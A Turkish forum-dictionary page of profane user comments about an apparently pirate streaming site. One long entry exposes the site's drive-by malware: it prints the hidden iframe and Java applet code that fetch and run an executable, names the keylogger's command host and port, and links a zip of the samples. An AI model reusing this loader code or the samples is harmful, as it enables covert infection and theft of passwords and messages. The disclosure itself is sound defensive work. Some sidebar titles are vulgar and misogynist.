-
1.
+1burdan dizi izlemeyin. oppsss cikiyor
-
2.
+1ccc dizimag ccc
-
3.
+1mahkeme ile bunlarıda gibmişler. sadece fragman yayınlar oldular. bundan 1 sene evveline kadar çok çok iyi iş yapıyorlardı. bütün dizileri hd'di. sonra 1 senedir zaten kötü gidiyorlardı. dizileri ve altyazılarını geç yüklemeler vs vs. nihayetinde mahkeme kararıyla küçüldüler*. ne diyelim artık (bkz: dizimag)'cıyız..
-
4.
0görüntü kalitelerinide yükselttiler artık. süper site oldu. bazi diziler oppsss çiikiyor ama genelde eski bölümleri.o kadarda olsun ama
-
5.
0ne lan o japon dizileri gerizekalılar
-
6.
0bu aralar cinsiyetimi yaşımı falan soruyor amk sitesi
-
7.
0the walking deadi güzel güzel izleyip 1 puan verdiğim site
-
8.
0dizihd.com varken burdan izleyen cahildir kızmamak lazım dizihd giber her türlü dizi izleme sitesini
film bile izleniyo lan -
9.
0virüs varmış lan burda izlemeyin amk
-
10.
0ekşici bi bin üşenmemiş yazmış, tabi copy paste tmek şart olur.Tümünü Göster
şimdiden özet: şifrelerimizi, mesajlarımızı çalıyolla, keyloggercı lamerler
windows bilgisayarlarda cok yuksek ihtimalle (edit: dogrulandi!) bir virus calistiran bir sitedir. evet, arka planda bilgisayariniza kurduklari programla klavyeden bastiginiz her tusu (sifreler, mesajlar, vb.) bir dosyaya kaydedip o dosyayi baskasina yolluyor. (bkz: keylogger)
(cok uzun lan bu, okumam diyenlere ozet: diziport, java applet'ler araciligiyla baska bir siteden keylogger programi indirip onu calistiriyor)
bundan sonrasi teknik aciklama, nasil bir sey yaptiklarini birlikte gorelim. sitenin kaynak kodunda,
--- kod 1---
<a href=" http://twitter.com/diziport" ; title="" style="font-size:12px;"><iframe name="java" src=" http://www.metinozdogan.com.tr/java/" ; width="1" height="1" scrolling="no" frameborder="0" marginwidth="0" marginheight="0"></iframe></a>
--- kod 1 ---
seklinde bir satir var. bunun yaptigi sey, siz sitenizi acinca tarayicida gorunmeyen bir pencerede metin ozdogan'in sitesinden (evet adini da yazalim da ne numaralar cevrildigi belli olsun) kodda gorulen sayfayi cagiriyor. (bkz: iframe)
peki bu sayfada ne var? " http://www.metinozdogan.com.tr/java/client.jar" ; seklinde bir java applet'i yukleyen bir kod. (dosya silinmis ama entry'nin devaminda butun bu dosyalar indirilebilir)
--- kod 2 ---
<applet code='javaupdater.class' width='1' height='1' archive=' http://www.metinozdogan.com.tr/java/client.jar'> ;
<param name="url" value=" http://www.medyaturk24.com/java/java.exe" ; />
</applet>
--- kod 2 ---
peki bu client.jar'in icinde ne var diyorsaniz, indirip decompile edip gorelim. icinden javaupdater.class cikiyor. hatta bakin ne guzel, hazir yapilmisi var:
--- kod 3 ---
http://pastebin.com/bmfv8xfp
--- kod 3 ---
peki bu java kodu ne yapiyor biraz aciklayacak olursak,
1) (windows bilgisayarlarda) c:documents and settingskullaniciadinizrundll32.exe seklinde, sistem dosyasi gibi gorunen ama aslinda sistem dosyasi olmayan bir dosya yaratiyor.
2) sonra kod 2'deki (bakin yukarda) url parametresinde yazan http://www.medyaturk24.com/java/java.exe (tiklamayin) dosyasini bilgisayariniza indiriyor ve bu dosyayi iste o rundll32.exe'nin icine yazip bilgisayara koyuyor.
3) sonra da bu internetten indirdigi dosyayi bilgisayarinizda calistiriyor. (kod 3, satir 50).
http://www.medyaturk24.com/java/ adresine gittiginizde muhtemelen daha once kullandiklari virusleri (ya da ne haltsa artik?) bulabiliyorsunuz. (82.exe 83.exe 84.exe 85.exe java.exe)
olur da silinir diye, butun bu dosyalari (exe'ler, .class, jar) zipleyip http://ge.tt/9dzsvf9 adresine koydum. link expire olursa isteyen yazarlar mesaj atabilirler tekrar koyarim.
java.exe adiyla gorunen dosyanin ne yaptigini benden daha tecrubeli reverse engineer'lara birakiyorum. sanirim emrah beyazkaya ( https://www.facebook.com/unlemisareti ) (diziport'un sahibi) simdi bize bir aciklama borclu, kim bu metin ozdogan, ne bu medyaturk'ten cekilen java.exe ve neden insanlarin bilgisayarlarinda calistiriliyor.
saygilar.
*)" >**)" >**)" >**)" >**)" >**)" >**)" >*~~
devami unpacked adli sozluk yazarindan geliyor, helal olsun adam ugrasmis.
--- spoiler ---
java.exe sunlari yapiyor:
enigma protector isimli bir yazılımla uygulamayı şifreleyerek antivirüslerden kaçmaya çalışmış ama pek başarılı olamamış sağlam antivirüsler tanıyor hatta 2 kere şifreleme yapılmış. önce aspack isimli uygulama ile (ki asıl dosya bu). sonra onu temp klasörüne çıkarıp çalıştıracak dosyayı da enigma ile şifrelemiş.
bilgisayara uzaktan erişmeyi sağlayan bir trojan bu. tipik trojan hareketi olarak kendini varsayılan tarayıcı gibi gösteriyor processlerde. ayrıca tarayıcı kapanırsa diye yedek olarak svchost.exe'nin de içine giriyor.
kendini c:?windows?system32?installdir?nod.exe olarak kopyalıyor ve bunu bilgisayar başlangıcında açılacak şekilde ayarlıyor. bu büyük ihtimal uac etkin olan sistemlerde c:usersuserappdataroamingnod.exe olur.
yine klagib trojan hareketi olarak registry'de local machine ve current user/software/microsoft/currentversion/run ve local machine/software/microsoft/?active setup/?installed components yerlerine yazarak yapıyor başlangıçta açılma ayarını. installed components altındaki keyi ?{8b51u067-e68s-ar02-qep7-i1l0440op7h3}
yalnız bu başlangıç bilgilerini trojan çalışırken silmek işe yaramaz. yeniler sürekli. önce nod.exe kaldırılmalı.
trojan sahibine ulaşmak için stapler4445.no-ip.org adresinden ip bilgisini alıyor. o dns adresi trojanın sahibinin bağlantısını açıp kapadığında falan değişen ip adresini güncel olarak tutuyor. işte trojan da o ip adresine bağlanıp sahibinin listesinde bağlanılabilir olarak görülüyor. kullandığı port 3361.
keylog bilgilerini yani bastığın her tuşun kaydedildiği dosya c:documents and settingsuserapplication datamicrosoftwindowsuwcuemzbapecg.dat burada tutuluyor bu vista ve üzerinde değişir tabi. c:usersuserappdata içinde bir yerlerde olur. şu uwcuemzbapecg kısmı da bilgisayara göre değişebilir bir ihtimal.
--- spoiler ---
onemli not: buyuk ihtimal bu siteye windows makinayla girdiyseniz virus kapmissiniz demektir. guncel bir anti-virus tarayici program isinizi gorecektir. (bkz: avira) bilgisayariniza full tarama yapin mumkunse. -
11.
01. son'u izleyecektim, eklememişler.
2. desperate housewives'ın altyazısını ekleyen muck çok uyuz amk. yalnız da çevirmiyo üstelik. altı üstü 45 dakika çevirecek, üç gün bekliyoruz. hayır beceremiyosan, bırak nazo82 yapsın. hatun speedy gonzales mübarek.
3. behzat ç 48. bölüm hala yok. -
12.
0mahkeme kararını gibeyim huur çocukları
-
13.
0yukarda okuduklarımdan sonra avira kurdurtan site
-
14.
0huur cocukları iyi site lan
-
15.
0@13 DNS ini sıfırla düzelir
-
16.
0kral site.
-
17.
0çok sıktınız bundan sonra burda takılcam a.q.
-
18.
0herşeyi facebook üzerinden yüklersen bir süre sonra haliyle telif, melif diye silerler dıbına koyim bu sebepten güncel takip edeceksin 3 yıl evvelki diziyi bu site üzerinden aratmayacaksın ama görüntü kalitesi şahanedir artık.
-
19.
0başındaki erkek sesi
-
20.
0lostun final bolumu düşmüş indirmeden izleyebilirsiniz muallakler
-
ccc rammstein ccc günaydın diler 29 12 2024
-
yılbaşına kadar kız ayarlamam lazım
-
cok konusma onuachu davari
-
170 boyunda pasif kazaklar
-
orta üstü bir kızın dminde eşek kadar erkek var
-
560binlik ile benim sexs sayım aynı
-
partnerimin dominant bir kadın olmasını istemem
-
sözlüğün dürüst onurlu erkekleri tam liste
-
inşaata gelen kadın mühendisler
-
aileniz sizin için çalışmak zorunda bunu unutmayin
-
karadenizliler ile yunanistanlıların
-
allah k4dinlarin belasini versin
-
bir masaj yapanım yok
-
the economist kapagi gibi olmus
-
kafkas man ermeni olmam hakkında ne
-
biciriği gibmişler
-
yalnızlığa alışmak hoş bir şey değil
-
gene verdigim maclara oynamadiniz degil mi
-
saat 5 ten beri elektrik yok
-
ulan salolar çayin çinden gelmesinin ne
-
bir tane eskort kazakla tanıştı diye
-
omuz egzersizi yap bakir liseli
-
keloğlan aramızda filminde
-
memati ve kayra üzerindeki tecrit
-
30 yaşındayım sevgilim olmadı hiç
-
ılmi ledün sahibi krallar bu yılbaşını
-
hepsi ceza aldı
-
hepimiz türküz ama
- / 1